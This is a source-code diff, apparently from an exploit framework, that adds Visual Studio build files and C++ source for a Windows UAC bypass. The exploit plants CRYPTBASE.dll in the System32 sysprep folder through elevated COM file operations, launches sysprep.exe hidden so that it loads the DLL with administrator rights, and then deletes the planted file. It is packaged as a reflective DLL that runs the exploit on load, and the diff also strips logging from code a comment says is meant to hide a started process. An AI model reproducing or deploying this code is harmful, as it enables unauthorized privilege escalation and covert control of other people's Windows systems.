      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+      <FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
    </ClCompile>
    <Link>
      <SubSystem>Windows</SubSystem>
@@ -124,6 +144,9 @@
      <EnableCOMDATFolding>true</EnableCOMDATFolding>
      <OptimizeReferences>true</OptimizeReferences>
    </Link>
+    <PostBuildEvent>
+      <Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL</Command>
+    </PostBuildEvent>
  </ItemDefinitionGroup>
  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
    <ClCompile>
@@ -134,6 +157,7 @@
      <IntrinsicFunctions>true</IntrinsicFunctions>
      <PreprocessorDefinitions>WIN64;_WIN64;NDEBUG;_WINDOWS;_USRDLL;WIN7ELEVATEDLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+      <FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
    </ClCompile>
    <Link>
      <SubSystem>Windows</SubSystem>
@@ -145,6 +169,9 @@
      <Path>
      </Path>
    </BuildLog>
+    <PostBuildEvent>
+      <Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.2 "$(TargetDir)$(TargetFileName)" &gt; NUL</Command>
+    </PostBuildEvent>
  </ItemDefinitionGroup>
  <ItemGroup>
    <ClInclude Include="stdafx.h" />
@@ -17,7 +17,6 @@ BOOL APIENTRY DllMain( HMODULE hModule,
 	//	Wee need to hide fact that we've started process thats why we immediately
 	//	Terminate host application.
 	//
-	CLogger::LogLine(TEXT("DLL: Hello"));

 	switch (ul_reason_for_call)
 	{
@@ -33,8 +32,6 @@ BOOL APIENTRY DllMain( HMODULE hModule,
 			startupInfo.cb = sizeof(startupInfo);
 			PROCESS_INFORMATION processInfo = {0};

-			CLogger::LogLine(TEXT("DLL: TIOR shell="));
-			CLogger::LogLine(cmd);

 			//
 			//	Create not visible window
@@ -0,0 +1,19 @@
+<?xml version="1.0" standalone="yes"?>
+<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <PropertyGroup>
+    <SolutionPath>.\Win7Elevate.sln</SolutionPath>
+  </PropertyGroup>
+
+  <Target Name="all" DependsOnTargets="x86;x64" />
+
+  <Target Name="x86">
+    <Message Text="Building bypassuac x86" />
+    <MSBuild Projects="$(SolutionPath)" Properties="Configuration=Release;Platform=Win32" Targets="Clean;Rebuild"/>
+  </Target>
+
+  <Target Name="x64">
+    <Message Text="Building bypassuac x64" />
+    <MSBuild Projects="$(SolutionPath)" Properties="Configuration=Release;Platform=x64" Targets="Clean;Rebuild"/>
+  </Target>
+</Project>
+
@@ -0,0 +1,151 @@
+## Ignore Visual Studio temporary files, build results, and
+## files generated by popular Visual Studio add-ons.
+
+# User-specific files
+*.suo
+*.user
+*.sln.docstates
+
+# Build results
+
+[Dd]ebug/
+[Rr]elease/
+x64/
+build/
+[Bb]in/
+[Oo]bj/
+
+# Enable "build/" folder in the NuGet Packages folder since NuGet packages use it for MSBuild targets
+!packages/*/build/
+
+# MSTest test Results
+[Tt]est[Rr]esult*/
+[Bb]uild[Ll]og.*
+
+*_i.c
+*_p.c
+*.ilk
+*.meta
+*.obj
+*.pch
+*.pdb
+*.pgc
+*.pgd
+*.rsp
+*.sbr
+*.tlb
+*.tli
+*.tlh
+*.tmp
+*.tmp_proj
+*.log
+*.vspscc
+*.vssscc
+.builds
+*.pidb
+*.log
+*.scc
+
+# Visual C++ cache files
+ipch/
+*.aps
+*.ncb
+*.opensdf
+*.sdf
+*.cachefile
+
+# Visual Studio profiler
+*.psess
+*.vsp
+*.vspx
+
+# Guidance Automation Toolkit
+*.gpState
+
+# ReSharper is a .NET coding add-in
+_ReSharper*/
+*.[Rr]e[Ss]harper
+
+# TeamCity is a build add-in
+_TeamCity*
+
+# DotCover is a Code Coverage Tool
+*.dotCover
+
+# NCrunch
+*.ncrunch*
+.*crunch*.local.xml
+
+# Installshield output folder
+[Ee]xpress/
+
+# DocProject is a documentation generator add-in
+DocProject/buildhelp/
+DocProject/Help/*.HxT
+DocProject/Help/*.HxC
+DocProject/Help/*.hhc
+DocProject/Help/*.hhk
+DocProject/Help/*.hhp
+DocProject/Help/Html2
+DocProject/Help/html
+
+# Click-Once directory
+publish/
+
+# Publish Web Output
+*.Publish.xml
+*.pubxml
+
+# NuGet Packages Directory
+## TODO: If you have NuGet Package Restore enabled, uncomment the next line
+#packages/
+
+# Windows Azure Build Output
+csx
+*.build.csdef
+
+# Windows Store app package directory
+AppPackages/
+
+# Others
+sql/
+*.Cache
+ClientBin/
+[Ss]tyle[Cc]op.*
+~$*
+*~
+*.dbmdl
+*.[Pp]ublish.xml
+*.pfx
+*.publishsettings
+
+# RIA/Silverlight projects
+Generated_Code/
+
+# Backup & report files from converting an old project file to a newer
+# Visual Studio version. Backup files are not needed, because we have git ;-)
+_UpgradeReport_Files/
+Backup*/
+UpgradeLog*.XML
+UpgradeLog*.htm
+
+# SQL Server files
+App_Data/*.mdf
+App_Data/*.ldf
+
+# =========================
+# Windows detritus
+# =========================
+
+# Windows image file caches
+Thumbs.db
+ehthumbs.db
+
+# Folder config file
+Desktop.ini
+
+# Recycle Bin used on file shares
+$RECYCLE.BIN/
+
+# Mac crap
+.DS_Store
@@ -0,0 +1,28 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio 2013
+VisualStudioVersion = 12.0.21005.1
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "bypassuac", "dll\reflective_dll.vcxproj", "{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|Win32 = Debug|Win32
+		Debug|x64 = Debug|x64
+		Release|Win32 = Release|Win32
+		Release|x64 = Release|x64
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|Win32.ActiveCfg = Release|Win32
+		{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|Win32.Build.0 = Release|Win32
+		{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|x64.ActiveCfg = Release|x64
+		{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|x64.Build.0 = Release|x64
+		{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|Win32.ActiveCfg = Release|Win32
+		{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|Win32.Build.0 = Release|Win32
+		{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|x64.ActiveCfg = Release|x64
+		{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|x64.Build.0 = Release|x64
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+EndGlobal
@@ -0,0 +1,204 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup Label="ProjectConfigurations">
+    <ProjectConfiguration Include="Debug|Win32">
+      <Configuration>Debug</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Debug|x64">
+      <Configuration>Debug</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|Win32">
+      <Configuration>Release</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|x64">
+      <Configuration>Release</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+  </ItemGroup>
+  <PropertyGroup Label="Globals">
+    <ProjectGuid>{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}</ProjectGuid>
+    <RootNamespace>reflective_dll</RootNamespace>
+    <Keyword>Win32Proj</Keyword>
+    <ProjectName>bypassuac</ProjectName>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <PlatformToolset>v120</PlatformToolset>
+    <CharacterSet>MultiByte</CharacterSet>
+    <WholeProgramOptimization>false</WholeProgramOptimization>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <PlatformToolset>v120</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <CharacterSet>MultiByte</CharacterSet>
+    <WholeProgramOptimization>false</WholeProgramOptimization>
+    <PlatformToolset>v120</PlatformToolset>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <PlatformToolset>v120</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
+  <ImportGroup Label="ExtensionSettings">
+  </ImportGroup>
+  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="PropertySheets">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="PropertySheets">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <PropertyGroup Label="UserMacros" />
+  <PropertyGroup>
+    <_ProjectFileVersion>11.0.50727.1</_ProjectFileVersion>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <OutDir>$(SolutionDir)$(Configuration)\</OutDir>
+    <IntDir>$(Configuration)\</IntDir>
+    <LinkIncremental>true</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
+    <IntDir>$(Platform)\$(Configuration)\</IntDir>
+    <LinkIncremental>true</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <OutDir>$(SolutionDir)$(Configuration)\</OutDir>
+    <IntDir>$(Configuration)\</IntDir>
+    <LinkIncremental>false</LinkIncremental>
+    <TargetName>$(ProjectName)-x86</TargetName>
+    <IncludePath>$(VCInstallDir)include;$(VCInstallDir)atlmfc\include;$(WindowsSDK_IncludePath);..\..\..\ReflectiveDLLInjection\common\;..\..\..\ReflectiveDLLInjection\dll\src\</IncludePath>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <OutDir>$(SolutionDir)$(Configuration)\</OutDir>
+    <IntDir>$(Configuration)\</IntDir>
+    <LinkIncremental>false</LinkIncremental>
+    <TargetName>$(ProjectName)-x64</TargetName>
+    <IncludePath>$(VCInstallDir)include;$(VCInstallDir)atlmfc\include;$(WindowsSDK_IncludePath);..\..\..\ReflectiveDLLInjection\common\;..\..\..\ReflectiveDLLInjection\dll\src\;</IncludePath>
+  </PropertyGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <ClCompile>
+      <Optimization>Disabled</Optimization>
+      <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <MinimalRebuild>true</MinimalRebuild>
+      <BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
+      <RuntimeLibrary>MultiThreadedDebugDLL</RuntimeLibrary>
+      <PrecompiledHeader />
+      <WarningLevel>Level3</WarningLevel>
+      <DebugInformationFormat>EditAndContinue</DebugInformationFormat>
+    </ClCompile>
+    <Link>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <SubSystem>Windows</SubSystem>
+      <TargetMachine>MachineX86</TargetMachine>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <Midl>
+      <TargetEnvironment>X64</TargetEnvironment>
+    </Midl>
+    <ClCompile>
+      <Optimization>Disabled</Optimization>
+      <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <MinimalRebuild>true</MinimalRebuild>
+      <BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
+      <RuntimeLibrary>MultiThreadedDebugDLL</RuntimeLibrary>
+      <PrecompiledHeader />
+      <WarningLevel>Level3</WarningLevel>
+      <DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
+    </ClCompile>
+    <Link>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <SubSystem>Windows</SubSystem>
+      <TargetMachine>MachineX64</TargetMachine>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <ClCompile>
+      <Optimization>MaxSpeed</Optimization>
+      <InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;WIN_X86;REFLECTIVE_DLL_EXPORTS;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <PrecompiledHeader />
+      <WarningLevel>Level3</WarningLevel>
+      <DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
+    </ClCompile>
+    <Link>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <SubSystem>Windows</SubSystem>
+      <OptimizeReferences>true</OptimizeReferences>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <TargetMachine>MachineX86</TargetMachine>
+    </Link>
+    <PostBuildEvent>
+      <Command>
+IF EXIST "..\..\..\..\..\data\post\" GOTO COPY
+    mkdir "..\..\..\..\..\data\post\"
+:COPY
+copy /y "$(TargetDir)$(TargetFileName)" "..\..\..\..\..\data\post\"</Command>
+    </PostBuildEvent>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <Midl>
+      <TargetEnvironment>X64</TargetEnvironment>
+    </Midl>
+    <ClCompile>
+      <Optimization>MaxSpeed</Optimization>
+      <InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
+      <WholeProgramOptimization>false</WholeProgramOptimization>
+      <PreprocessorDefinitions>WIN64;NDEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;WIN_X64;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <PrecompiledHeader />
+      <WarningLevel>Level3</WarningLevel>
+      <DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
+      <CompileAs>CompileAsCpp</CompileAs>
+    </ClCompile>
+    <Link>
+      <OutputFile>$(OutDir)$(TargetName)$(TargetExt)</OutputFile>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <SubSystem>Windows</SubSystem>
+      <OptimizeReferences>true</OptimizeReferences>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <TargetMachine>MachineX64</TargetMachine>
+    </Link>
+    <PostBuildEvent>
+      <Command>
+IF EXIST "..\..\..\..\..\data\post\" GOTO COPY
+    mkdir "..\..\..\..\..\data\post\"
+:COPY
+copy /y "$(TargetDir)$(TargetFileName)" "..\..\..\..\..\data\post\"</Command>
+    </PostBuildEvent>
+  </ItemDefinitionGroup>
+  <ItemGroup>
+    <ClCompile Include="src\Exploit.cpp" />
+    <ClCompile Include="src\ReflectiveDll.c" />
+    <ClCompile Include="..\..\..\ReflectiveDLLInjection\dll\src\ReflectiveLoader.c" />
+  </ItemGroup>
+  <ItemGroup>
+    <ClInclude Include="src\Exploit.h" />
+    <ClInclude Include="..\..\..\ReflectiveDLLInjection\common\ReflectiveDLLInjection.h" />
+    <ClInclude Include="..\..\..\ReflectiveDLLInjection\dll\src\ReflectiveLoader.h" />
+  </ItemGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
+  <ImportGroup Label="ExtensionTargets">
+  </ImportGroup>
+</Project>
@@ -0,0 +1,119 @@
+#include "Exploit.h"
+
+void exploit()
+{
+
+	const wchar_t *szSysPrepDir = L"\\System32\\sysprep\\";
+	const wchar_t *szSysPrepDir_syswow64 = L"\\Sysnative\\sysprep\\";
+	const wchar_t *sySysPrepExe = L"sysprep.exe";
+	const wchar_t *szElevDll = L"CRYPTBASE.dll";
+	const wchar_t *szSourceDll = L"CRYPTBASE.dll";
+	wchar_t szElevDir[MAX_PATH] = {};
+	wchar_t szElevDir_syswow64[MAX_PATH] = {};
+	wchar_t szElevDllFull[MAX_PATH] = {};
+	wchar_t szElevDllFull_syswow64[MAX_PATH] = {};
+	wchar_t szElevExeFull[MAX_PATH] = {};
+	wchar_t path[MAX_PATH] = {};
+	wchar_t windir[MAX_PATH] = {};
+	const wchar_t *szElevArgs = L"";
+	const wchar_t  *szEIFOMoniker = NULL;
+	PVOID OldValue = NULL;
+
+	IFileOperation *pFileOp = NULL;
+	IShellItem *pSHISource = 0;
+	IShellItem *pSHIDestination = 0;
+	IShellItem *pSHIDelete = 0;
+
+	const IID *pIID_EIFO = &__uuidof(IFileOperation);
+	const IID *pIID_EIFOClass = &__uuidof(FileOperation);
+	const IID *pIID_ShellItem2 = &__uuidof(IShellItem2);
+
+	GetWindowsDirectoryW(windir, MAX_PATH);
+	GetTempPathW(MAX_PATH, path);
+
+	/* %temp%\cryptbase.dll */
+	wcscat_s(path, MAX_PATH, szSourceDll);
+	
+	/* %windir%\System32\sysprep\ */
+	wcscat_s(szElevDir, MAX_PATH, windir);
+	wcscat_s(szElevDir, MAX_PATH, szSysPrepDir);
+
+	/* %windir%\sysnative\sysprep\ */
+	wcscat_s(szElevDir_syswow64, MAX_PATH, windir);
+	wcscat_s(szElevDir_syswow64, MAX_PATH, szSysPrepDir_syswow64);
+
+	/* %windir\system32\sysprep\cryptbase.dll */
+	wcscat_s(szElevDllFull, MAX_PATH, szElevDir);
+	wcscat_s(szElevDllFull, MAX_PATH, szElevDll);
+
+	/* %windir\sysnative\sysprep\cryptbase.dll */
+	wcscat_s(szElevDllFull_syswow64, MAX_PATH, szElevDir_syswow64);
+	wcscat_s(szElevDllFull_syswow64, MAX_PATH, szElevDll);
+
+	/* %windir%\system32\sysprep\sysprep.exe */
+	wcscat_s(szElevExeFull, MAX_PATH, szElevDir);
+	wcscat_s(szElevExeFull, MAX_PATH, sySysPrepExe);
+
+	if (CoInitialize(NULL) == S_OK)
+	{	
+		if (CoCreateInstance(*pIID_EIFOClass, NULL, CLSCTX_LOCAL_SERVER | CLSCTX_INPROC_SERVER | CLSCTX_INPROC_HANDLER, *pIID_EIFO, (void**) &pFileOp) == S_OK)
+		{
+			if (pFileOp->SetOperationFlags(FOF_NOCONFIRMATION | FOF_NOERRORUI | FOF_SILENT | FOFX_SHOWELEVATIONPROMPT | FOFX_NOCOPYHOOKS | FOFX_REQUIREELEVATION) == S_OK)
+			{
+				if (SHCreateItemFromParsingName((PCWSTR) path, NULL, *pIID_ShellItem2, (void**) &pSHISource) == S_OK)
+				{
+					if (SHCreateItemFromParsingName(szElevDir, NULL, *pIID_ShellItem2, (void**) &pSHIDestination) == S_OK)
+					{
+						if (pFileOp->CopyItem(pSHISource, pSHIDestination, szElevDll, NULL) == S_OK)
+						{
+							/* Copy the DLL file to the sysprep folder*/
+							if (pFileOp->PerformOperations() == S_OK)
+							{
+								/* Execute sysprep.exe */
+								SHELLEXECUTEINFOW shinfo;
+								ZeroMemory(&shinfo, sizeof(shinfo));
+								shinfo.cbSize = sizeof(shinfo);
+								shinfo.fMask = SEE_MASK_NOCLOSEPROCESS;
+								shinfo.lpFile = szElevExeFull;
+								shinfo.lpParameters = szElevArgs;
+								shinfo.lpDirectory = szElevDir;
+								shinfo.nShow = SW_HIDE;
+
+								Wow64DisableWow64FsRedirection(&OldValue);
+								if (ShellExecuteExW(&shinfo) && shinfo.hProcess != NULL)
+								{
+									WaitForSingleObject(shinfo.hProcess, 10000);
+									CloseHandle(shinfo.hProcess);
+								}
+
+								if (S_OK == SHCreateItemFromParsingName(szElevDllFull, NULL, *pIID_ShellItem2, (void**)&pSHIDelete))
+								{
+									if (0 != pSHIDelete)
+									{
+										if (S_OK == pFileOp->DeleteItem(pSHIDelete, NULL))
+										{
+                      pFileOp->PerformOperations();
+											// If we fail to delete the file probably SYSWOW64 process so use SYSNATIVE to get the correct path
+											// DisableWOW64Redirect fails at this? Possibly due to how it interacts with UAC see:
+											// http://msdn.microsoft.com/en-us/library/windows/desktop/aa384187(v=vs.85).aspx
+											if (S_OK == SHCreateItemFromParsingName(szElevDllFull_syswow64, NULL, *pIID_ShellItem2, (void**)&pSHIDelete))
+											{
+												if (0 != pSHIDelete)
+												{
+													if (S_OK == pFileOp->DeleteItem(pSHIDelete, NULL))
+													{
+														pFileOp->PerformOperations();
+													}
+												}
+											}
+										}
+									}
+								}
+							}
+						}
+					}
+				}
+			}
+		}
+	}
+}
@@ -0,0 +1,8 @@
+#include <Windows.h>
+#include <commctrl.h>
+#include <shlobj.h>
+#include <Shellapi.h>
+#include <stdio.h>
+#include <guiddef.h>
+
+EXTERN_C void exploit();
@@ -0,0 +1,26 @@
+#include "ReflectiveLoader.h"
+#include "Exploit.h"
+
+extern HINSTANCE hAppInstance;
+
+BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved )
+{
+    BOOL bReturnValue = TRUE;
+	switch( dwReason ) 
+    { 
+		case DLL_QUERY_HMODULE:
+			if( lpReserved != NULL )
+				*(HMODULE *)lpReserved = hAppInstance;
+			break;
+		case DLL_PROCESS_ATTACH:
+			hAppInstance = hinstDLL;
+			exploit();
+			ExitProcess(0);
+			break;
+		case DLL_PROCESS_DETACH:
+		case DLL_THREAD_ATTACH:
+		case DLL_THREAD_DETACH:
+            break;
+    }
+	return bReturnValue;
+}
@@ -0,0 +1,38 @@
+@ECHO OFF
+IF "%VCINSTALLDIR%" == "" GOTO NEED_VS
+
+IF "%1"=="x86" GOTO BUILD_X86
+IF "%1"=="X86" GOTO BUILD_X86
+IF "%1"=="x64" GOTO BUILD_X64
+IF "%1"=="X64" GOTO BUILD_X64
+
+ECHO "Building Exploits x64 and x86 (Release)"
+SET PLAT=all
+GOTO RUN
+
+:BUILD_X86
+ECHO "Building Exploits x86 (Release)"
+SET PLAT=x86
+GOTO RUN
+
+:BUILD_X64
+ECHO "Building Exploits x64 (Release)"
+SET PLAT=x64
+GOTO RUN
+
+:RUN
+ECHO "Building Bypass UAC Injection"
+msbuild.exe make.msbuild /target:%PLAT%
+
+
+FOR /F "usebackq tokens=1,2 delims==" %%i IN (`wmic os get LocalDateTime /VALUE 2^>NUL`) DO IF '.%%i.'=='.LocalDateTime.' SET LDT=%%j
+SET LDT=%LDT:~0,4%-%LDT:~4,2%-%LDT:~6,2% %LDT:~8,2%:%LDT:~10,2%:%LDT:~12,6%
+echo Finished %ldt%
+
+GOTO :END
+
+:NEED_VS
+ECHO "This command must be executed from within a Visual Studio Command prompt."
+ECHO "This can be found under Microsoft Visual Studio 2013 -> Visual Studio Tools"
+
+:END
@@ -0,0 +1,19 @@
+<?xml version="1.0" standalone="yes"?>
+<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <PropertyGroup>
+    <SolutionPath>.\bypassuac_injection.sln</SolutionPath>
+  </PropertyGroup>
+
+  <Target Name="all" DependsOnTargets="x86;x64" />
+
+  <Target Name="x86">
+    <Message Text="Building Bypass UAC (Injection) Release version x86" />
+    <MSBuild Projects="$(SolutionPath)" Properties="Configuration=Release;Platform=Win32" Targets="Clean;Rebuild"/>
+  </Target>
+
+  <Target Name="x64">
+    <Message Text="Building Bypass UAC (Injection) Release version x64" />
+    <MSBuild Projects="$(SolutionPath)" Properties="Configuration=Release;Platform=x64" Targets="Clean;Rebuild"/>
+  </Target>
+</Project>
+
@@ -0,0 +1,151 @@
+## Ignore Visual Studio temporary files, build results, and
+## files generated by popular Visual Studio add-ons.
+
+# User-specific files
+*.suo
+*.user
+*.sln.docstates
+
+# Build results
+
+[Dd]ebug/
+[Rr]elease/
+x64/
+build/
+[Bb]in/
+[Oo]bj/
+
+# Enable "build/" folder in the NuGet Packages folder since NuGet packages use it for MSBuild targets
+!packages/*/build/
+
+# MSTest test Results
+[Tt]est[Rr]esult*/
+[Bb]uild[Ll]og.*
+
+*_i.c
+*_p.c
+*.ilk
+*.meta
+*.obj
+*.pch
+*.pdb
+*.pgc
+*.pgd
+*.rsp
+*.sbr
+*.tlb
+*.tli
+*.tlh
+*.tmp
+*.tmp_proj
+*.log
+*.vspscc
+*.vssscc
+.builds
+*.pidb
+*.log
+*.scc
+
+# Visual C++ cache files
+ipch/
+*.aps
+*.ncb
+*.opensdf
+*.sdf
+*.cachefile
+
+# Visual Studio profiler
+*.psess
+*.vsp
+*.vspx
+
+# Guidance Automation Toolkit
+*.gpState
+
+# ReSharper is a .NET coding add-in
+_ReSharper*/
+*.[Rr]e[Ss]harper
+
+# TeamCity is a build add-in
+_TeamCity*
+
+# DotCover is a Code Coverage Tool
+*.dotCover
+
+# NCrunch
+*.ncrunch*
+.*crunch*.local.xml
+
+# Installshield output folder
+[Ee]xpress/
+
+# DocProject is a documentation generator add-in
+DocProject/buildhelp/
+DocProject/Help/*.HxT
+DocProject/Help/*.HxC
+DocProject/Help/*.hhc
+DocProject/Help/*.hhk
+DocProject/Help/*.hhp
+DocProject/Help/Html2
+DocProject/Help/html
+
+# Click-Once directory
+publish/
+
+# Publish Web Output
+*.Publish.xml
+*.pubxml
+
+# NuGet Packages Directory
+## TODO: If you have NuGet Package Restore enabled, uncomment the next line
+#packages/
+
+# Windows Azure Build Output
+csx
+*.build.csdef
+
+# Windows Store app package directory
+AppPackages/
+
+# Others
+sql/
+*.Cache
+ClientBin/
+[Ss]tyle[Cc]op.*
+~$*
+*~
+*.dbmdl
+*.[Pp]ublish.xml
+*.pfx
+*.publishsettings
+
+# RIA/Silverlight projects
+Generated_Code/
+
+# Backup & report files from converting an old project file to a newer
+# Visual Studio version. Backup files are not needed, because we have git ;-)
+_UpgradeReport_Files/
+Backup*/
+UpgradeLog*.XML
+UpgradeLog*.htm
+
+# SQL Server files
+App_Data/*.mdf
+App_Data/*.ldf
+
+# =========================
+# Windows detritus
+# =========================
+
+# Windows image file caches
+Thumbs.db
+ehthumbs.db
+
+# Folder config file
+Desktop.ini
+
+# Recycle Bin used on file shares
+$RECYCLE.BIN/
+
+# Mac crap
+.DS_Store
@@ -0,0 +1,20 @@
+
+Microsoft Visual Studio Solution File, Format Version 11.00
+# Visual Studio 2010
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "cve-2013-3881", "cve-2013-3881\cve-2013-3881.vcxproj", "{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|Win32 = Debug|Win32
+		Release|Win32 = Release|Win32
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Debug|Win32.ActiveCfg = Debug|Win32
+		{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Debug|Win32.Build.0 = Debug|Win32
+		{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Release|Win32.ActiveCfg = Release|Win32
